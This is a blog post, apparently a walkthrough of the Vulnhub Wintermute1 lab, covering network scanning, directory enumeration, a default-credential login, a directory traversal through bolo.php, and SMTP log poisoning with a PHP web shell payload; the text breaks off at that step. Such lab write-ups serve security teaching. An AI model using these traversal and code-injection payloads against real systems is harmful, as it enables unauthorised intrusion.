{"id":391,"date":"2024-03-14T18:49:56","date_gmt":"2024-03-14T10:49:56","guid":{"rendered":"http:\/\/162.14.82.114\/?p=391"},"modified":"2024-03-14T18:50:20","modified_gmt":"2024-03-14T10:50:20","slug":"vulnhub-wintermute1","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/391\/03\/14\/2024\/","title":{"rendered":"Vulnhub&#8211;WINTERMUTE1"},"content":{"rendered":"<h1>WINTERMUTE1<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849243.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849243.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240302231216321\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>Setting up the lab<\/h2>\n<p>Opening it up, there is a setup guide:<\/p>\n<pre><code class=\"language-text\">Wintermute Vitrual Box Setup Guide\n\nThis lab makes use of pivoting, so the VirtualBox networks need to be setup correctly. It&#039;s quick and easy with all dynamic ips.\nrun or Import each machine into Virtual Box ( File &gt;&gt; Import Applicance )\n\n---------------------------------------------------------------------------------------------------------------------------\n\nSTRAYLIGHT (Network #1 &amp; #2)\n-This is the first machine to get root. 
Setup to be dual-homed\/2 NIC&#039;s.\n-Adapter 1 \n    - Host-only Adapter\n    - VirtualBox Host-Only Ethernet Adapter #1\n    Advanced (we want 2 NIC&#039;s, each on a separate network)\n    - Adapter Type - Intel PRO\/1000 T Server \n-Adapter 2\n    - Host-only Adapter\n    - VirtualBox Host-Only Ethernet Adapter #2\n    Advanced\n    - Adapter Type - Intel PRO\/1000 MT Desktop (or other adapter type different than network #1).\n\n---------------------------------------------------------------------------------------------------------------------------\n\nNEUROMANCER (Network #2)\n-This is the final machine to get root. Setup to have 1 network. Only accessed via Straylight, using Host-Only Eth adapter #2.\n-Adapter 1\n    - Host-only Adapter\n    - VirtualBox Host-Only Ethernet Adapter #2\n    Advanced\n    - Adapter Type - Intel PRO\/1000 MT Desktop\n\n---------------------------------------------------------------------------------------------------------------------------\n\nKALI (Network #1)\n- Your attacking machine should only be setup on the Host-Only adpater Straylight is on...and NAT if you choose.\n- You should not be able to ping Neuromancer from your Kali box. 
If you can, you are cheating.\n- Adapter 1\n    - Host-only Adapter\n    - VirtualBox Host-Only Ethernet Adapter #1\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849247.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849247.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240302234750727\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849248.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849248.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240302234807426\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Try a scan:<\/p>\n<pre><code class=\"language-bash\">sudo nmap -sn -v 192.168.244.0\/24<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849249.png'><img 
class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849249.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303000906897\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h1>straylight<\/h1>\n<h2>Information gathering<\/h2>\n<h3>Port scanning<\/h3>\n<p>I am not sure whether this is the right host, so try scanning its ports:<\/p>\n<pre><code class=\"language-bash\">nmap -p- -sV -Pn -T5 -v -A --script=vuln 192.168.244.130<\/code><\/pre>\n<ul>\n<li><code>-Pn<\/code>: Skips host discovery and assumes the target host is online. No ping probes are sent before the scan.<\/li>\n<li><code>-T5<\/code>: Sets the scan speed. <code>-T5<\/code> uses the fastest scan speed, but may also increase the risk of being detected.<\/li>\n<li><code>-v<\/code>: Enables verbose output, showing detailed information during the scan.<\/li>\n<li><code>-A<\/code>: Enables OS detection, version detection, script scanning and traceroute, giving more complete information.<\/li>\n<li><code>--script=vuln<\/code>: 
Runs the vulnerability scanning scripts. This attempts to detect vulnerabilities that may exist on the target host.<\/li>\n<\/ul>\n<pre><code class=\"language-text\">Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-02 11:08 EST\nNSE: Loaded 150 scripts for scanning.\nNSE: Script Pre-scanning.\nInitiating NSE at 11:08\nCompleted NSE at 11:08, 10.07s elapsed\nInitiating NSE at 11:08\nCompleted NSE at 11:08, 0.00s elapsed\nInitiating Parallel DNS resolution of 1 host. at 11:08\nCompleted Parallel DNS resolution of 1 host. at 11:08, 0.01s elapsed\nInitiating Connect Scan at 11:08\nScanning 192.168.244.130 [65535 ports]\nDiscovered open port 80\/tcp on 192.168.244.130\nDiscovered open port 25\/tcp on 192.168.244.130\nDiscovered open port 3000\/tcp on 192.168.244.130\nCompleted Connect Scan at 11:08, 11.34s elapsed (65535 total ports)\nInitiating Service scan at 11:08\nScanning 3 services on 192.168.244.130\nCompleted Service scan at 11:08, 6.12s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.244.130.\nInitiating NSE at 11:08\nNSE: [firewall-bypass] lacks privileges.\nCompleted NSE at 11:09, 59.07s elapsed\nInitiating NSE at 11:09\nNSE: [tls-ticketbleed] Not running due to lack of privileges.\nCompleted NSE at 11:09, 1.12s elapsed\nNmap scan report for 192.168.244.130\nHost is up (0.0017s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT     STATE SERVICE VERSION\n25\/tcp   open  smtp    Postfix smtpd\n| smtp-vuln-cve2010-4344: \n|_  The SMTP server is not Exim: NOT VULNERABLE\n| ssl-dh-params: \n|   VULNERABLE:\n|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability\n|     State: VULNERABLE\n|       Transport Layer Security (TLS) services that use anonymous\n|       Diffie-Hellman key exchange only provide protection against passive\n|       eavesdropping, and are vulnerable to active man-in-the-middle attacks\n|       which could completely compromise the confidentiality and 
integrity\n|       of any data exchanged over the resulting session.\n|     Check results:\n|       ANONYMOUS DH GROUP 1\n|             Cipher Suite: TLS_DH_anon_WITH_AES_256_CBC_SHA\n|             Modulus Type: Safe prime\n|             Modulus Source: Unknown\/Custom-generated\n|             Modulus Length: 2048\n|             Generator Length: 8\n|             Public Key Length: 2048\n|     References:\n|_      https:\/\/www.ietf.org\/rfc\/rfc2246.txt\n80\/tcp   open  http    Apache httpd 2.4.25 ((Debian))\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-enum: \n|_  \/manual\/: Potentially interesting folder\n|_http-server-header: Apache\/2.4.25 (Debian)\n3000\/tcp open  http    Mongoose httpd\n| http-fileupload-exploiter: \n|   \n|_    Couldn&#039;t find a file-type field.\n| http-vuln-cve2010-0738: \n|_  \/jmx-console\/: Authentication was not required\n|_http-trane-info: Problem with XML parsing of \/evox\/about\n|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)\n|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-slowloris-check: \n|   VULNERABLE:\n|   Slowloris DOS attack\n|     State: LIKELY VULNERABLE\n|     IDs:  CVE:CVE-2007-6750\n|       Slowloris tries to keep many connections to the target web server open and hold\n|       them open as long as possible.  It accomplishes this by opening connections to\n|       the target web server and sending a partial request. 
By doing so, it starves\n|       the http server&#039;s resources causing Denial Of Service.\n|       \n|     Disclosure date: 2009-09-17\n|     References:\n|       http:\/\/ha.ckers.org\/slowloris\/\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2007-6750\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n| http-csrf: \n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.244.130\n|   Found the following possible CSRF vulnerabilities: \n|     \n|     Path: http:\/\/192.168.244.130:3000\/\n|     Form id: \n|_    Form action: \/authorize.html\nService Info: Host:  straylight\n\nNSE: Script Post-scanning.\nInitiating NSE at 11:09\nCompleted NSE at 11:09, 0.00s elapsed\nInitiating NSE at 11:09\nCompleted NSE at 11:09, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 88.04 seconds<\/code><\/pre>\n<p>Some of the output is omitted, but the scan clearly found three open ports: <code>25<\/code>, <code>80<\/code> and <code>3000<\/code>. Try opening port <code>80<\/code> first.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849250.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849250.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303002715964\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849251.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849251.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303002812151\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>OK, this is the right target.<\/p>\n<h3>Directory scanning<\/h3>\n<pre><code class=\"language-bash\">dirsearch -u http:\/\/192.168.244.130 -e* -i 200,300-399 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 1000<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849252.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849252.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014002264\" \/><\/div><\/p>\n<h2>Exploitation<\/h2>\n<h3>Checking the sensitive directories<\/h3>\n<p>Take a look at a few sensitive directories:<\/p>\n<pre><code class=\"language-qpl\">\/manual\n\/freeside\n:3000<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849253.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849253.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014402955\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849254.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849254.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014431239\" 
style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849255.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849255.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014605294\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Try the default account and password written above:<\/p>\n<pre><code class=\"language-apl\">admin<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849256.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849256.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014724724\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>We are in!!!! Click around and see whether there is anything we can use.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849257.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849257.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014829202\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Take a look at this directory:<\/p>\n<pre><code class=\"language-apl\">\/turing-bolo<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849258.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849258.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015054985\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Check whether there is any hidden information:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849259.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849259.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015142100\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849261.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849261.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015359761\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Try viewing the log files:<\/p>\n<pre><code class=\"language-apl\">molly.log\narmitage.log\nriviera.log<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849262.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849262.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015542198\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849263.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849263.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015617344\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849264.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849264.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015656924\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<h3>Trying log injection<\/h3>\n<p>Test whether directory traversal is possible:<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.244.130\/turing-bolo\/bolo.php?bolo=..\/..\/..\/log\/mail<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849265.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849265.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303020108527\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>The mail service found appears to be <code>postfix<\/code>. Setting its vulnerabilities aside for now, try log inclusion instead; that first requires getting a web shell into the log, and the <code>smtp<\/code> service is open:<\/p>\n<pre><code class=\"language-apl\">nc 192.168.244.130 25\n# telnet 192.168.244.130 25\nHELO hack\nMAIL FROM:&lt;hack@gmail.com&gt;\nRCPT TO:&lt;?php system(&#039;whoami&#039;); ?&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 